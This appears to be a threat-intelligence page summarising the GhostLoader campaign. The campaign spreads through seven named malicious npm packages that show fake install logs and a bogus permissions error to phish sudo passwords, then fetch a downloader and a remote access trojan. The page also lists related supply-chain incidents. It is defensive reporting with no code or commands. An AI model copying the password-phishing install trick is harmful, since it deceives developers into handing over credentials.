GhostLoader staged npm install payload activity
Malware Activity
Summary
Hide ▲
Show ▼
GhostLoader is now being delivered through staged npm install scripts, turning routine package installation into a route for data theft and cryptocurrency wallet targeting. The chain uses fake install logs and a bogus permissions error to push developers into revealing a sudo/root password. After that step, the malware retrieves a downloader that connects to C2 infrastructure and fetches the final payload. The result is a remote access trojan that can harvest data, focus on wallets, and wait for further instructions.
Related Happenings
Malware-Slop malicious npm file-theft campaign
Campaign
First: 27.05.2026 18:44
Last: 27.05.2026 18:44
Sources 1
About this happening:
The **Malware-Slop** campaign is distributing a malicious **npm** package that steals local files from installers, creating an unauthorized data-transfer risk for users of **Anthr...
Malware-Slop malicious npm file-theft campaign
CampaignAbout this happening: The **Malware-Slop** campaign is distributing a malicious **npm** package that steals local files from installers, creating an unauthorized data-transfer risk for users of **Anthr...
TrapDoor trap-core.js credential-stealing package malware
Malware Activity
First: 25.05.2026 08:59
Last: 25.05.2026 08:59
Sources 1
About this happening:
The **TrapDoor** package malware is spreading across **npm, PyPI, and Crates.io**, putting **developer secrets, cloud credentials, SSH keys, and crypto wallets** at risk. The malw...
TrapDoor trap-core.js credential-stealing package malware
Malware ActivityAbout this happening: The **TrapDoor** package malware is spreading across **npm, PyPI, and Crates.io**, putting **developer secrets, cloud credentials, SSH keys, and crypto wallets** at risk. The malw...
Node-ipc malicious versions with stealer/backdoor payload
Malware Activity
First: 14.05.2026 20:22
Last: 14.05.2026 20:22
Sources 1
About this happening:
Three **node-ipc** releases now carry an **obfuscated stealer/backdoor** that can harvest **developer and cloud secrets** from any system that loads the package. The malicious cod...
Node-ipc malicious versions with stealer/backdoor payload
Malware ActivityAbout this happening: Three **node-ipc** releases now carry an **obfuscated stealer/backdoor** that can harvest **developer and cloud secrets** from any system that loads the package. The malicious cod...
Filemanager backdoor delivered on compromised cPanel environments
Malware Activity
First: 11.05.2026 20:54
Last: 11.05.2026 20:54
Sources 1
About this happening:
The **Filemanager** backdoor is being deployed on **compromised cPanel/WHM systems**, giving attackers **remote command execution** and shell access. It is delivered through a **s...
Filemanager backdoor delivered on compromised cPanel environments
Malware ActivityAbout this happening: The **Filemanager** backdoor is being deployed on **compromised cPanel/WHM systems**, giving attackers **remote command execution** and shell access. It is delivered through a **s...
PyTorch Lightning hit by network compromise
Incident
First: 04.05.2026 20:15
Last: 04.05.2026 20:15
Sources 1
About this happening:
A **malicious PyTorch Lightning release** on **PyPI** created a supply-chain compromise that can steal credentials as soon as the package is imported. The backdoored **version 2.6...
PyTorch Lightning hit by network compromise
IncidentAbout this happening: A **malicious PyTorch Lightning release** on **PyPI** created a supply-chain compromise that can steal credentials as soon as the package is imported. The backdoored **version 2.6...
Timeline
-
24.03.2026 14:00 2 articles · 2mo ago
ReversingLabs identifies malicious npm packages published by mikilanjillo
Initial DisclosureSecurity researchers identify seven malicious npm packages published by mikilanjillo, including react-performance-suite, react-state-optimizer-core, react-fast-utilsa, ai-fast-auto-trader, pkgnewfefame1, carbon-mac-copy-cloner, and coinbase-desktop-sdk, that disguise their behavior with fake npm install logs, trigger a bogus write-permissions error for "/usr/local/lib/node_modules," phish for sudo/root credentials, fetch a second-stage downloader from Telegram or Teletype.in, and deploy GhostLoader and a remote access trojan aimed at cryptocurrency wallets and sensitive data.
Show sources
- Ghost Campaign Uses 7 npm Packages to Steal Crypto Wallets and Credentials — thehackernews.com — 24.03.2026 14:00
- Ghost Campaign Uses 7 npm Packages to Steal Crypto Wallets and Credentials — thehackernews.com — 24.03.2026 14:00